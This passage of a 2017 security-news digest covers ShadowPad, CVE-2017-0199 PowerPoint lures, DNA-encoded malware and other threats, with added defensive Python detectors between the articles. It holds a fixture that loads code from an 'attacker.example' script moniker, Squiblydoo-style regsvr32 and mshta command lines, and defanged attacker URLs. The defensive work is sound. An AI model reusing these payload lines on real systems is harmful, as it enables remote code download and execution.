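    next month's unknown domain would still be caught this way.
    """
    by_pair = defaultdict(list)
    for ts, client, qname, _ in records:
        by_pair[(client, qname)].append(ts)
    hits = []
    for pair, stamps in by_pair.items():
        if len(stamps) < min_queries:
            continue
        stamps.sort()
        deltas = [later - earlier for earlier, later in zip(stamps, stamps[1:])]
        if all(abs(d - period) <= tolerance for d in deltas):
            hits.append(pair)
    return sorted(hits)


def is_door_magic(four_bytes):
    """Check the per-packet marker on decrypted bytes: 52 4F 4F 44 read as a
    little-endian DWORD is 0x444F4F52, i.e. 'DOOR' in big-endian ASCII."""
    (value,) = struct.unpack("<I", four_bytes)
    return value == int.from_bytes(b"DOOR", "big")


if __name__ == "__main__":
    recs = parse_dns_log(SAMPLE_DNS_LOG)
    print("IoC hits:", find_known_domains(recs))
    print("8-hour beacons:", find_periodic_beacons(recs))
```

The cadence check is the more durable of the two signals: the activation domain changes every month, so a static list goes stale, while the 8-hour check-in interval is a property of the implant itself. The magic-DWORD check only applies after the proprietary encryption has been stripped, so it belongs in a memory or sample analysis step, not on the wire.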

ShadowPad backdoor software update process

The ShadowPad backdoor is a modular platform that can be used to download and execute arbitrary code on the infected system, create processes, and maintain a virtual file system in the registry.

The remote access capability implemented in the ShadowPad backdoor includes a domain generation algorithm (DGA) for C&C servers that changes every month. Experts noticed that the threat actor behind the ShadowPad backdoor had already registered the domains covering July to December 2017, a circumstance that led them to believe that the attack started around mid-July 2017.

Kaspersky Lab revealed that the first known compile date for the ShadowPad backdoor is July 13; the malicious code was signed with a legitimate NetSarang certificate.

ShadowPad is an example of the dangers posed by an attack against the software update process; other successful supply-chain attacks have recently made the headlines, such as NotPetya, which spread by exploiting the software supply chain of the Ukrainian financial software provider MeDoc.

NetSarang customers are urged to check their software for the presence of the backdoor. The affected versions of NetSarang containing the malicious nssock2.dll are Xmanager Enterprise 5 Build 1232, Xmanager 5 Build 1045, Xshell 5 Build 1322, Xftp 5 Build 1218 and Xlpd 5 Build 1220.

“Given that the NetSarang programs are used in hundreds of critical networks around the world, on servers and workstations belonging to system administrators, it is strongly recommended that companies take immediate action to identify and contain the compromised software,” states Kaspersky Lab.

Kaspersky published the list of Indicators of Compromise to help companies to check their systems.

How Just Opening A Malicious PowerPoint File Could Compromise Your PC

15.8.2017 thehackernews Virus

A few months back we reported how opening a simple MS Word file could compromise your computer using a critical vulnerability in Microsoft Office.
The Microsoft Office remote code execution vulnerability (CVE-2017-0199) resided in the Windows Object Linking and Embedding (OLE) interface, for which a patch was issued in April this year, but threat actors are still abusing the flaw through different mediums.
Security researchers have spotted a new malware campaign that is leveraging the same exploit, but for the first time, hidden behind a specially crafted PowerPoint (PPSX) Presentation file.
According to the researchers at Trend Micro, who spotted the malware campaign, the targeted attack starts with a convincing spear-phishing email attachment, purportedly from a cable manufacturing provider and mainly targets companies involved in the electronics manufacturing industry.
Researchers believe this attack involves the use of a sender address disguised as a legitimate email sent by a sales and billing department.
Here's How the Attack Works:
The complete attack scenario is listed below:

Step 1: The attack begins with an email that contains a malicious PowerPoint (PPSX) file in the attachment, pretending to be shipping information about an order request.
Step 2: Once opened, the PPSX file uses an XML reference embedded in it to download a "logo.doc" file from a remote location and runs it via the PowerPoint Show animations feature.
Step 3: The malformed Logo.doc file then triggers the CVE-2017-0199 vulnerability, which downloads and executes RATMAN.exe on the targeted system.
Step 4: RATMAN.exe is a Trojanized version of the Remcos Remote Control tool, which when installed, allows attackers to control infected computers from its command-and-control server remotely.

Remcos is a legitimate, customizable remote access tool that lets users control their systems from anywhere in the world, with capabilities such as download-and-execute, a keylogger, a screen logger, and recorders for both webcam and microphone.
Since the exploit has mostly been delivered via infected Rich Text Format (.RTF) documents, most detection methods for CVE-2017-0199 focus on RTF. The use of PPSX files therefore also allows attackers to evade antivirus detection.
The easiest way to protect yourself from this attack is to download and apply the patches Microsoft released in April that address the CVE-2017-0199 vulnerability.

British Researcher Pleads Not Guilty to Creating Malware

15.8.2017 securityweek Virus
British cybersecurity researcher Marcus Hutchins, known online as “MalwareTech,” has pleaded not guilty in a U.S. court to charges related to creating and selling a banking Trojan named Kronos.

The 23-year-old expert from Ilfracombe, England, became famous and was named a “hero” in May after he helped stop the WannaCry ransomware attack by registering a domain that acted as a kill switch for the malware. MalwareTech had not made his real identity known online, but the fame brought by the WannaCry incident led to reporters tracking him down.

On Monday, Hutchins, who works for LA-based Kryptos Logic, pleaded not guilty in a Wisconsin federal court to all the charges brought against him. The researcher cannot leave the United States during his trial and will be tracked via GPS.

Interestingly, while he will be allowed to access the Internet in order to continue working, he has been prohibited from accessing the domain used to stop the WannaCry outbreak.

The researcher was arrested while preparing to return to the U.K. from Las Vegas, where the Black Hat and Def Con security conferences had taken place. He was later released on a $30,000 bond, an amount raised by his friends and supporters.

The expert and an unnamed individual who Hutchins allegedly conspired with have been charged with six counts related to the creation, advertising, sale and use of the Kronos malware.

According to authorities, which claim these activities took place in 2014 and 2015, Hutchins’ partner attempted to sell the malware on dark web marketplaces, including the recently shut down AlphaBay, for $2,000 and $3,000.

Many believe the charges against the British researcher are the result of a mistake, considering his involvement in malware analysis. Some believe code written by him may have been weaponized by cybercriminals. A legal defense donation page has been set up to raise the funds necessary to ensure that Hutchins gets a fair trial.

"Marcus Hutchins is a brilliant young man and a hero," said Marcia Hofmann, the EFF and Zeitgeist Law attorney representing Hutchins at the hearing on Monday. "He is going to vigorously defend himself against these charges. And when the evidence comes to light we are confident he will be fully vindicated."

Hutchins is also represented by Brian Klein, a partner at Baker Marquart.

PowerPoint Slide Show Files Used to Install Malware

15.8.2017 securityweek Virus
PowerPoint Slide Show Files Exploited for RAT Distribution

A Microsoft Office vulnerability patched by Microsoft in April, after threat actors had been using it in live attacks, is being abused in a new manner to infect computers with a remote access Trojan, Trend Micro warns.

Tracked as CVE-2017-0199, the remote code execution vulnerability, initially exploited as a zero-day, was previously abused in attacks leveraging malicious Rich Text Format (RTF) documents, exploiting a flaw in Office’s Object Linking and Embedding (OLE) interface to deliver malware such as the DRIDEX banking Trojan.

In recently observed attacks, however, CVE-2017-0199 is being exploited using a new method in which PowerPoint Slide Show files are abused for malware delivery. The malicious document is delivered as an attachment to a spear-phishing email, and the security researchers suggest that, as part of the attack, a sender address masquerading as that of a business partner is used.

The email message is supposedly an order request, but no business documents are attached to it. What is attached is a malicious PowerPoint Show (PPSX) file that supposedly leverages CVE-2017-8570, a different Microsoft Office vulnerability (the reference is likely an error made by the toolkit developer; the file actually exploits CVE-2017-0199).

Once the file has been opened, PowerPoint initializes the script moniker and runs the remote malicious payload via the PowerPoint Show animations feature. Successful exploitation of CVE-2017-0199 downloads a file called logo.doc, which is actually an XML file containing JavaScript code.

The JavaScript runs a PowerShell command to download and execute RATMAN.EXE from its command and control (C&C) server. This file is a Trojanized version of the REMCOS legitimate and customizable remote access tool (RAT) that, once executed, provides the attacker with the possibility to run remote commands on the user’s system.

The tool can be used to download and execute commands on the infected machine, to log keystrokes and screen activity, and to record audio and video using the system’s microphone and webcam. The Trojanized tool uses an unknown .NET protector to add more protection and obfuscation to hinder analysis even more, and also leverages encrypted communication.

“Ultimately, the use of a new method of attack is a practical consideration; since most detection methods for CVE-2017-0199 focuses on the RTF method of attack, the use of a new vector—PPSX files—allows attackers to evade antivirus detection,” Trend Micro notes.
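Because a PPSX file is an OOXML zip, the remote reference that the attack chain in both PowerPoint articles above relies on (the script moniker that fetches logo.doc) has to live in a relationship part of the package. The Python below is an added example, not Trend Micro’s code: it builds a minimal PPSX-like archive in memory with a constructed slide relationship file and scans every .rels part for external relationships that point at a script: moniker or at remote, non-hyperlink content. The placeholder URL, the relationship layout and the relationship Type are assumptions; only the script: moniker and the logo.doc name come from the articles.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"

# External targets that make Office fetch content from outside the package.
# "script:" is the moniker named in the PPSX analysis; the rest are the usual
# remote-template/OLE schemes seen with CVE-2017-0199 RTF lures.
REMOTE_PREFIXES = ("http://", "https://", "file://", "\\\\")

# Constructed slide relationship parts (not real samples). The URL is a
# placeholder and the oleObject Type is illustrative.
MALICIOUS_SLIDE_RELS = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/>
  <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="script:http://attacker.example/logo.doc" TargetMode="External"/>
</Relationships>
"""

# A benign deck with an ordinary web hyperlink, to show what must not be flagged.
CLEAN_SLIDE_RELS = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/>
  <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.example.com/" TargetMode="External"/>
</Relationships>
"""


def build_sample_ppsx(slide_rels_xml):
    """Construct a minimal PPSX-like zip in memory (test fixture, not a real file)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("ppt/slides/slide1.xml", "<p:sld/>")
        z.writestr("ppt/slides/_rels/slide1.xml.rels", slide_rels_xml)
    return buf.getvalue()


def scan_ooxml_relationships(data):
    """Return (part name, relationship type, target) for each external
    relationship that loads remote content rather than being a plain link."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(REL_NS + "Relationship"):
                if rel.get("TargetMode", "").lower() != "external":
                    continue
                target = rel.get("Target", "")
                rel_type = rel.get("Type", "")
                lowered = target.lower()
                is_script_moniker = lowered.startswith("script:")
                is_remote_non_link = (not rel_type.endswith("/hyperlink")
                                      and lowered.startswith(REMOTE_PREFIXES))
                if is_script_moniker or is_remote_non_link:
                    findings.append((name, rel_type.rsplit("/", 1)[-1], target))
    return findings


if __name__ == "__main__":
    for label, rels in (("malicious", MALICIOUS_SLIDE_RELS), ("clean", CLEAN_SLIDE_RELS)):
        print(label, scan_ooxml_relationships(build_sample_ppsx(rels)))
```

Ordinary external hyperlinks are deliberately left alone so that a deck with links to web pages does not trip the check; a relationship of any other type that points off-package is what warrants a closer look, and the same scan applies unchanged to DOCX and XLSX containers, which is the point the RTF-only detections quoted above miss.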

As always when malicious documents delivered via spam email are involved, users should exercise extra caution when opening them (the same applies to clicking on links in emails), even if they appear to come from legitimate sources. Organizations should also implement mitigation techniques against phishing attacks to avoid compromise.

“Users should also always patch their systems with the latest security updates. Given that Microsoft already addressed this vulnerability back in April, users with updated patches are safe from these attacks,” the security researchers also note.

DNA Contains Instructions for Biological and Computer Viruses
12.8.2017 securityaffairs

University of Washington scientists have created an experiment that shows how DNA can be used to create not only biological viruses, but also viruses that can infect computers.
Deoxyribonucleic acid (DNA) is one of the oldest methods for storing information. It is found in almost all living cells, and DNA information is used in nature to determine “traits as diverse as the color of a person’s eyes, the scent of a rose, and the way in which bacteria infect a lung cell.“
It consists of four different “nucleotides,” which combine in different ways to provide genetic instructions for different outcomes. I like to think of it like binary machine code, where combinations of 0’s and 1’s define a program for a computer to execute. This is probably a common analogy, since scientists have been encoding digital data into organic DNA for a while now.
In 2012, Harvard researchers encoded an entire book in DNA. In 2013, researchers at the European Bioinformatics Institute encoded Shakespearean sonnets, digital photos and a recording of Dr. Martin Luther King Jr.’s “I have a dream” speech in DNA. University of Washington researchers and Microsoft Research staff collaborated to store an OK Go music video in DNA in 2016. Although this last one may sound frivolous, it is an example of the technology becoming more capable and easier to work with. While it is unlikely that DNA will replace more traditional digital storage media, it will likely find a few use cases for which it is specifically well suited. In other words, we can expect the decoding of DNA information to become a regular occurrence. And whenever information is being handled, we should expect the bad guys to try to profit from it in unique ways.
This is exactly what Tadayoshi Kohno at the University of Washington was thinking about when he and his team devised the experiment to encode a malicious virus in DNA — a virus that doesn’t compromise humans, but computers. While much of scientists’ work with DNA happens with organic materials, some of it requires computers to decode the DNA information into a digital format and this is where the research team focused their attack.
[We] “synthesized DNA strands that, after sequencing and post-processing, generated a file; when used as input into a vulnerable program, this file yielded an open socket for remote control“, the authors wrote in their paper titled “Computer Security, Privacy, and DNA Sequencing: Compromising Computers with Synthesized DNA, Privacy Leaks, and More”.

The team admits that they created the “best possible environment” in which to test their theory. They changed the source code of the fqzcomp DNA compressor to include a fixed data buffer which would be vulnerable to a buffer overflow attack. The next step was to encode the buffer overflow data into synthetic DNA. Encoding digital information into DNA that uses only four nucleotides with physical restrictions on the combinations is challenging and took many iterations, but the team was eventually able to come up with a viable formula and it was sent to Integrated DNA Technologies for synthesis.
When the vial of DNA was received from the synthesis service, the team now had a computer program vulnerable to the exploit encoded on that DNA and the test was ready to go. They sequenced the DNA samples using the known-vulnerable fqzcomp compressor and 37% of the time the attack was successful — the buffer overflow compromised the computer system and could have granted unauthorized access to the perpetrators.
“[the] attack was fully translated only about 37 percent of the time since the sequencer’s parallel processing often cut it short or—another hazard of writing code in a physical object—the program decoded it backward. (A strand of DNA can be sequenced in either direction, but a code is meant to be read in only one. The researchers suggest in their paper that future, improved versions of the attack might be crafted as a palindrome.)”, reads the Wired Magazine article.
Is this a viable attack? It depends on many factors. The bad guys would have to compromise software used in the DNA sequencing and analysis stages like these researchers did. Or they would have to find existing vulnerabilities in the software currently being used (not hard to imagine when you realize how many vulnerabilities exist in all software.) The bad guys would also have to arrange for the target to receive a sample of the specially crafted malicious DNA, or find a vulnerability that could be exploited by known samples that did not require modification. There are a variety of ways the DNA processes could be compromised but for now, they are all complex with a low probability of success. It will take a lot of (financial) motivation or time for malicious researchers to make these attacks viable. But we know it is possible, so we can start to think about the implications now.
“We know that if an adversary has control over the data a computer is processing, it can potentially take over that computer,” says Tadayoshi Kohno. “That means when you’re looking at the security of computational biology systems, you’re not only thinking about the network connectivity and the USB drive and the user at the keyboard but also the information stored in the DNA they’re sequencing. It’s about considering a different class of threat.”

Malware campaign targets Russian-Speaking companies with a new Backdoor
11.8.2017 securityaffairs

Trend Micro spotted a new espionage campaign that has been active for at least 2 months and that is targeting Russian-speaking firms with a new backdoor
Security experts at Trend Micro have spotted a new cyber espionage campaign that has been active for at least two months and that is targeting Russian-speaking enterprises with a new Windows-based backdoor.

The attackers leverage several exploits and Windows components to run malicious scripts and avoid detection. The last sample associated with this attack was uploaded to VirusTotal on June 6, 2017, and experts at Trend Micro observed five spam campaigns running from June 23 to July 27, 2017.

Hackers are targeting financial institutions and mining firms with different spear phishing messages.

The phishing messages are designed to appear as if they were sent from sales and billing departments and contain a weaponized Rich Text Format (RTF) file that exploits the CVE-2017-0199 flaw in Microsoft Office’s Windows Object Linking and Embedding (OLE) interface.

Once the exploit code is executed, it downloads a fake Excel XLS file embedded with malicious JavaScript. When opened, the Excel header is ignored and the file is treated as an HTML Application file by the Windows component mshta.exe.

“The exploit code downloads what is supposedly an XLS file from hxxps://wecloud[.]biz/m11[.]xls. This domain, to which all of the URLs used by this attack point to, is controlled by the attacker and was registered in early July.” states the analysis published by Trend Micro.

“This fake Excel spreadsheet file is embedded with malicious JavaScript. The Excel header will actually be ignored and the file will be treated as an HTML Application file by mshta.exe, the Windows component that handles/opens HTA or HTML files.”

The JavaScript code uses the legitimate Windows executable odbcconf.exe to run a DLL. Once executed, the DLL drops an SCT file (Windows scriptlet) in the %APPDATA% folder with the .TXT extension appended to it.

The DLL then launches a Squiblydoo attack, which abuses Regsvr32 (Microsoft Register Server) to bypass restrictions on running scripts and to evade application whitelisting protections such as AppLocker.

“This particular command uses the Regsvr32 (Microsoft Register Server) command-line utility, which is normally used to register and unregister OLE controls in the Windows registry, including DLL files. This attack method is also known as Squiblydoo—Regsvr32 is abused to bypass restrictions on running scripts.” continues the analysis. “It also means evading application whitelisting protections such as AppLocker. While Squiblydoo is already a known attack vector, this is the first time we’ve seen it combined with odbcconf.exe.”

In May, experts at FireEye spotted a new APT group that was targeting Vietnamese interests around the globe; those hackers leveraged the Squiblydoo technique to download a backdoor from APT32 infrastructure.

Next, the real backdoor is downloaded and executed. It is an XML file downloaded from the domain wecloud[.]biz, and in this case too it is executed using the same Regsvr32-abusing Squiblydoo technique.

“This is another SCT file with obfuscated JavaScript code that contains backdoor commands, which essentially allow attackers to take over an infected system. It attempts to connect to its C&C server at hxxps://wecloud[.]biz/mail/ajax[.]php and retrieve tasks to carry out, some of which are:

d&exec = download and execute PE file
gtfo = delete files/startup entries and terminate
more_eggs = download additional/new scripts
more_onion = run new script and terminate current script
more_power = run command shell commands
” reads the analysis.

Experts noted that, although the attack chain appears complex, it starts with a Microsoft Office exploit. The best defense is still to patch and keep software up to date.
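The chain above (mshta.exe opening a fake XLS as an HTA, odbcconf.exe loading a DLL, and Regsvr32 running a scriptlet) is detectable from process-creation telemetry. The following is an added example written for this page, not Trend Micro's detection logic: it runs three rules plus an Office-ancestry check over constructed sample events (PIDs, paths and the URL are placeholders).

```python
import re
from typing import Dict, List

# Constructed sample process-creation events (not real telemetry): one
# Office-launched chain modelled on the page's description, plus a benign
# regsvr32 use for contrast. Paths, PIDs and the URL are placeholders.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "cmdline": r'WINWORD.EXE "C:\Users\u\Downloads\invoice.rtf"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://example.invalid/m11.xls"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\odbcconf.exe",
     "cmdline": r"odbcconf.exe /a {regsvr C:\Users\u\AppData\Roaming\x.dll}"},
    {"pid": 500, "ppid": 400, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s /n /u /i:C:\Users\u\AppData\Roaming\a.txt scrobj.dll"},
    {"pid": 600, "ppid": 100, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'regsvr32.exe /s "C:\Program Files\Vendor\ctl.ocx"'},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
LOLBINS = {"mshta.exe", "odbcconf.exe", "regsvr32.exe"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rules_for(ev: dict) -> List[str]:
    """Return the names of the rules a single event trips (empty if none)."""
    img = basename(ev["image"])
    cmd = ev["cmdline"].lower()
    hits = []
    # mshta handed a URL or a file that is not an .hta: the page's fake XLS
    # is treated as an HTML Application regardless of its name.
    if img == "mshta.exe":
        args = cmd.split()[1:]
        if any(a.startswith("http") or not a.endswith(".hta") for a in args):
            hits.append("mshta_non_hta_input")
    # odbcconf asked to register (load) a DLL via its regsvr action.
    if img == "odbcconf.exe" and "regsvr" in cmd:
        hits.append("odbcconf_regsvr_dll")
    # regsvr32 loading the scriptlet host, pointing /i: at a URL, or at a
    # scriptlet hidden behind another extension (the page's .TXT-renamed SCT).
    if img == "regsvr32.exe":
        if "scrobj.dll" in cmd or re.search(r"/i:(https?:|\S+\.(txt|sct)\b)", cmd):
            hits.append("regsvr32_scriptlet")
    return hits


def descends_from_office(ev: dict, by_pid: Dict[int, dict]) -> bool:
    """Walk the parent chain; True if any ancestor is an Office application."""
    seen = set()
    cur = by_pid.get(ev["ppid"])
    while cur is not None and cur["pid"] not in seen:
        seen.add(cur["pid"])
        if basename(cur["image"]) in OFFICE_APPS:
            return True
        cur = by_pid.get(cur["ppid"])
    return False


def analyze(events: List[dict]) -> Dict[int, List[str]]:
    """Map pid -> rule names for every event that trips at least one rule.
    A LOLBin that descends from an Office process also gets 'office_lolbin_chain'."""
    by_pid = {e["pid"]: e for e in events}
    findings: Dict[int, List[str]] = {}
    for ev in events:
        hits = rules_for(ev)
        if basename(ev["image"]) in LOLBINS and descends_from_office(ev, by_pid):
            hits.append("office_lolbin_chain")
        if hits:
            findings[ev["pid"]] = hits
    return findings


if __name__ == "__main__":
    for pid, hits in analyze(EVENTS).items():
        print(pid, hits)
```

The benign regsvr32 event (pid 600) produces no finding, while each stage of the chain is flagged both on its own command line and on its Office ancestry.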

Malware Encoded Into DNA Hacks the Computer that Reads It

10.8.2017 thehackernews  Virus

Do you know that 1 gram of DNA can store 1,000,000,000 terabytes of data for 1000+ years?
In March this year, a team of researchers successfully stored digital data — an entire operating system, a movie, an Amazon gift card, a study and a computer virus — in strands of DNA.
But what if someone stores a malicious program in DNA, just like an infected USB drive, to hijack the computer that reads it?
A team of researchers from the University of Washington in Seattle has demonstrated the first successful DNA-based exploit of a computer system: the computer executes the malicious code written into synthesised DNA strands while reading them.
To carry out the hack, the researchers created biological malware and encoded it in a short stretch of DNA, which allowed them to gain "full control" of a computer that tried to process the genetic data when read by a DNA sequencing machine.
The DNA-based hack is possible because of the lack of security in several DNA processing programs available online, which contain insecure function calls and buffer overflow vulnerabilities.
"We analysed the security of 13 commonly used, open source programs. We selected these programs methodically, choosing ones written in C/C++," reads the research paper [PDF], titled "Computer Security, Privacy, and DNA Sequencing: Compromising Computers with Synthesized DNA, Privacy Leaks, and More."
"We found that existing biological analysis programs have a much higher frequency of insecure C runtime library function calls (e.g., strcpy). This suggests that DNA processing software has not incorporated modern software security best practices."
To create the biological malware, the researchers translated a simple computer program into a short stretch of 176 DNA letters, denoted as A, G, C, and T, each representing a binary pair (A=00, C=01, G=10, T=11).
The exploit took advantage of a basic buffer overflow, in which the program ends up executing the malicious command because the input exceeds the maximum length of a buffer.
The command then contacted a server controlled by the team, from where the researchers took control of a computer in their laboratory they were using to analyse the DNA file.
"Our exploit did not target a program used by biologists in the field; rather it targeted one that we modified to contain a known vulnerability," the researchers said.
Although this kind of hack probably doesn't pose any threat anytime soon, the team warned that hackers could in future use fake blood or spit samples to gain access to computers, steal information, or hack medical equipment installed at forensic labs, hospitals and DNA-based data storage centers.
The researchers will be presenting this first "DNA-based exploit of a computer system" at next week's Usenix Security Symposium in Vancouver. For a more in-depth explanation of the DNA-based hack, you can head on to the research paper.
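Both DNA articles above describe the same two mechanics: two bits per nucleotide (A=00, C=01, G=10, T=11, so 176 letters carry 44 bytes) and the failure mode in which the sequencer reads the strand backward, which the paper proposes to counter with a palindromic encoding. The following is an added example written for this page, not the researchers' code or their exploit bytes: it implements the encoding, models the backward read, and adds the output-length check that the modified fqzcomp build lacked (the `max_bytes` parameter is constructed for this example, not a fqzcomp option).

```python
from typing import Dict, Optional

# Two bits per nucleotide, as the page describes: A=00, C=01, G=10, T=11.
BASE_OF_BITS = {0b00: "A", 0b01: "C", 0b10: "G", 0b11: "T"}
BITS_OF_BASE: Dict[str, int] = {b: v for v, b in BASE_OF_BITS.items()}


def encode(data: bytes) -> str:
    """Turn bytes into a nucleotide string, most significant bit pair first."""
    out = []
    for byte in data:
        for shift in (6, 4, 2, 0):
            out.append(BASE_OF_BITS[(byte >> shift) & 0b11])
    return "".join(out)


def decode(seq: str, max_bytes: Optional[int] = None) -> bytes:
    """Inverse of encode(). Rejects unknown letters, partial bytes and, when
    max_bytes is given, output that would not fit a fixed-size buffer: the
    bounds check whose absence made the page's fqzcomp build exploitable.
    (max_bytes is a constructed parameter for this example.)"""
    if len(seq) % 4:
        raise ValueError("sequence length must be a multiple of 4 letters")
    if max_bytes is not None and len(seq) // 4 > max_bytes:
        raise ValueError("decoded data would exceed the buffer")
    out = bytearray()
    for i in range(0, len(seq), 4):
        byte = 0
        for letter in seq[i:i + 4]:
            if letter not in BITS_OF_BASE:
                raise ValueError(f"unexpected letter {letter!r}")
            byte = (byte << 2) | BITS_OF_BASE[letter]
        out.append(byte)
    return bytes(out)


def read_backward(seq: str) -> str:
    """Model the failure mode quoted from Wired: the strand is read in the
    opposite direction, so the decoder sees the letters reversed."""
    return seq[::-1]


def make_palindrome(seq: str) -> str:
    """The idea the paper floats: a palindromic strand reads the same in either
    direction, so the leading bytes survive a backward read."""
    return seq + seq[::-1]


def survives_backward_read(data: bytes) -> bool:
    """True if the payload bytes are recovered from the palindromic strand
    whether it is read forward or backward."""
    pal = make_palindrome(encode(data))
    n = len(data)
    return decode(pal)[:n] == data and decode(read_backward(pal))[:n] == data


if __name__ == "__main__":
    payload = b"Hi"  # constructed sample bytes, not the paper's payload
    seq = encode(payload)
    print(seq, decode(seq), decode(read_backward(seq)))  # backward read garbles it
    print(survives_backward_read(payload))
```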

Smoke Loader Backdoor Gets Anti-Analysis Improvements

8.8.2017 securityweek  Virus
The infamous Smoke Loader backdoor now has more complex anti-analysis techniques that allow it to remain a potent malware delivery mechanism, PhishLabs security researchers warn.

Also known as Dofoil, Smoke Loader has been advertised on dark web forums since at least mid-2011. Packing a modular design, the malware can receive secondary execution instructions and/or download additional functional modules. Lately, the loader has been used in the distribution of malware such as the TrickBot banking Trojan and GlobeImposter ransomware.

The Smoke Loader installer, the security researchers explain, spawns an EnumTools thread to detect and evade analysis tools, and uses an API to enumerate running analysis utilities. The malware checks for twelve analysis processes via a hash-based method, and terminates itself if one is found running. As part of an anti-VM check, it also queries the name and the volume information of the infected machine, along with a registry key.

“There are two main paths of execution in Smoke Loader, the installer and the loader. The installer path runs prior to spawning and injects into a new instance of a Windows Explorer process. Post injection, the loader runs and executes the core functionality of the module. Before injection occurs, Smoke Loader performs several checks to determine information about the system on which it is running,” PhishLabs says.

Smoke Loader was observed leveraging the VirtualProtect API call to change the protection of the allocated memory region, the security researchers reveal. Toward the end of the loader execution path, the malware also checks whether injection should occur, and execution continues if injection has not yet been performed.

The malware was observed performing networking checks to ensure the loader has Internet access (it can generate fake traffic for that). The security researchers also noticed that, unlike previous versions, the latest Smoke Loader variant uses a custom XOR-based algorithm to decode strings within the sample. Previously, the strings weren’t encoded.

“While Smoke Loader’s distribution is not as wide spread as other malware families, it is under continued development and very effective at what it does. The loader’s longevity indicates that the developers are committed to persistence and protection of their loader from the latest analysis techniques. Even though it dates back to 2011, the loader has undergone several transformations that allow it to continue to be a potent malware delivery mechanism in 2017,” PhishLabs concludes.

Hacker Sentenced to 46 Months in Prison for Spreading Linux Malware
4.8.2017 thehackernews

A Russian man accused of infecting tens of thousands of computer servers worldwide to generate millions in fraudulent payments has been imprisoned for 46 months (nearly four years) in a United States' federal prison.
41-year-old Maxim Senakh, of Velikii Novgorod, was arrested by Finnish police in August 2015 for his role in the development and maintenance of the infamous Linux botnet called Ebury that siphoned millions of dollars from victims worldwide.
Senakh was extradited to the United States in February 2016 to face charges and pleaded guilty in late March this year, admitting to helping create the massive Ebury botnet and personally profiting from the scheme.
First spotted in 2011, Ebury is an SSH backdoor Trojan for Linux and Unix-style operating systems, such as FreeBSD or Solaris, which gives attackers full remote shell control of an infected machine even if the password for the affected user account is changed regularly.
Senakh and his associates used the malware to build an Ebury botnet network of thousands of compromised Linux systems, which had the capacity of sending over 35 million spam messages and redirecting more than 500,000 online visitors to exploit kits every day.

Senakh fraudulently generated millions of dollars in revenue by running spam campaigns and committing advertising click fraud.
"Working within a massive criminal enterprise, Maxim Senakh helped create a sophisticated infrastructure that victimized thousands of Internet users across the world," said Acting U.S. Attorney Brooker.
"As society becomes more reliant on computers, cyber criminals like Senakh pose a serious threat. This Office, along with our law enforcement partners, is committed to detecting and prosecuting cyber criminals no matter where they reside."
Ebury first came into headlines in 2011 after Donald Ryan Austin, 27, of El Portal, Florida, installed the Trojan on multiple servers owned by kernel.org and the Linux Foundation, which maintain and distribute the Linux operating system kernel.
Austin, with no connection to the Ebury criminal gang, was arrested in September last year and was charged with 4 counts of intentional transmission causing damage to a protected computer.
Senakh was facing up to a combined 30 years in prison, after pleading guilty to conspiracy to commit wire fraud as well as violate the Computer Fraud and Abuse Act.
However, a US judge on Thursday sentenced Senakh to 46 months in prison, the Department of Justice announced on Thursday. The case was investigated by the Federal Bureau of Investigation's field office in Minneapolis.
Senakh will be deported back to Russia following his release from the U.S. prison.

UK Security Researcher 'Hero' Accused of Creating Bank Malware

4.8.2017 securityweek  Virus
A British computer security researcher hailed as a hero for thwarting the "WannaCry" ransomware onslaught was in US custody on Thursday after being indicted on charges of creating malware to attack banks.

Marcus Hutchins, known by the alias "Malwaretech," was charged in an indictment dated July 12 and unsealed by federal authorities in Wisconsin.

The US Justice Department said in a statement Hutchins was arrested Wednesday in Las Vegas, where a major Def Con hacker security conference took place over the weekend.

Twitter postings from other security researchers said he was detained as he prepared to fly back to Britain.

Hutchins faces criminal charges including conspiracy to commit computer fraud, according to the US Department of Justice.

The indictment accuses Hutchins and another individual of making and distributing Kronos "banking Trojan," a reference to malicious software designed to steal user names and passwords used at online banking sites.

Since it was created, Kronos has been configured to work on banking systems in Britain, Canada, Germany, Poland, France, and other countries, according to the DOJ.

The indictment set the time of the activity by Hutchins as being from July 2014 to July of the following year.

- 'Dark markets' -

Hutchins was part of a conspiracy to distribute the hacking tool on so-called dark markets, according to the indictment signed last month by US Attorney Gregory Haanstad.

Kronos was evidently first made available through certain internet forums in early 2014, and was marketed and distributed through a hidden online AlphaBay marketplace, according to US prosecutors.

AlphaBay was shut down by US and European police in a crackdown on two huge "dark web" marketplaces that allowed the anonymous online trade of drugs, hacking software and guns.

The timing of the indictment of Hutchins raises questions as to whether insights mined from the AlphaBay probe led to his arrest.

Underground websites AlphaBay and Hansa Market had tens of thousands of sellers of deadly drugs like fentanyl and other illicit goods serving more than 200,000 customers worldwide.

